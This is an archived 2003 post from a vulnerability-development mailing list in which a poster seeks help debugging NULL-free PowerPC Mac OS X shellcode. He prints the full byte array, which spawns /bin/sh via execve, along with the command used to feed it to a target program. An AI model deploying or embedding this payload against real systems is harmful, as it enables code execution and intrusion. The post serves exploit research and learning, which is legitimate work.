Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Mac OS X shellcode and SIGTRAP

From: David Riley <oscar () the-rileys net>
Date: Sat, 24 May 2003 02:15:54 -0400
I'm trying to use ghandi's OS X shellcode to get started on some development. More specifically, I'm modifying it not to use NULL chars so I can pass it though strings. I've got it working so far, except that any application I try it with straight from the shell (i.e. ./a.out `cat code`) dies with a segfault, and when I run it with GDB, I get a SIGTRAP in __dyld__dyld_start (which is where syscall 11/59 seem to branch to). If I just continue in GDB, it goes through and launches the shell like it's supposed to. What am I doing wrong? Here's the code: 

char shellcode[] =
"\x7c\xa5\x2a\x78"  /* xor.   r5, r5, r5    ; r5 = NULL           */
"\x7f\xe8\x02\xa6"  /* mflr   r31                                 */
"\x38\x65\x04\xf0"  /* addi   r3, r5, 0x4f << 4                   */
"\x7c\x63\x26\x70"  /* srawi  r3, r3, 4                           */
"\x7c\xA3\xf9\xae"  /* stbx   r5, r3, r31 (terminate /bin/sh)     */
"\x38\x65\x04\x50"  /* addi   r3, r5, 0x45 << 4                   */
"\x7c\x63\x26\x70"  /* srawi  r3, r3, 4                           */
"\x7c\xA3\xfb\x2e"  /* sthx   r5, r3, r31 (fix sc)                */
"\x40\xa2\xff\xfd"  /* bnel   shellcode                           */
"\x7f\xe8\x02\xa6"  /* mflr   r31                                 */
"\x3b\xff\x01\x30"  /* addi   r31, r31, 268+36                    */
"\x38\x7f\xfe\xf4"  /* addi   r3, r31, -268 ; r3 = path           */
"\x90\x61\xff\xf8"  /* stw    r3, -8(r1)    ; argv[0] = path      */
"\x90\xa1\xff\xfc"  /* stw    r5, -4(r1)    ; argv[1] = NULL      */
"\x38\x81\xff\xf8"  /* subi   r4, r1, 8     ; r4 = {path, 0}      */
"\x3b\xc0\x76\x01"  /* li     r30, 30209                          */
"\x7f\xc0\x4e\x70"  /* srawi  r0, r30, 9                          */
"\x44\xff\xff\x02"  /* sc                   ; execve(r3, r4, r5)  */
  "/bin/sh";
By the way, I copy the shellcode into a file, removing the NULL terminator from "/bin/sh" so it won't hang there (and I know this works because of the aforementioned success with GDB). 

Original source of OS X (Darwin) shellcode (credit where due):
        http://www.dopesquad.net/security/shellcode/ppc/execve_binsh.h

Thanks in advance,
        David
Previous By Date Next
Previous By Thread Next

Current thread: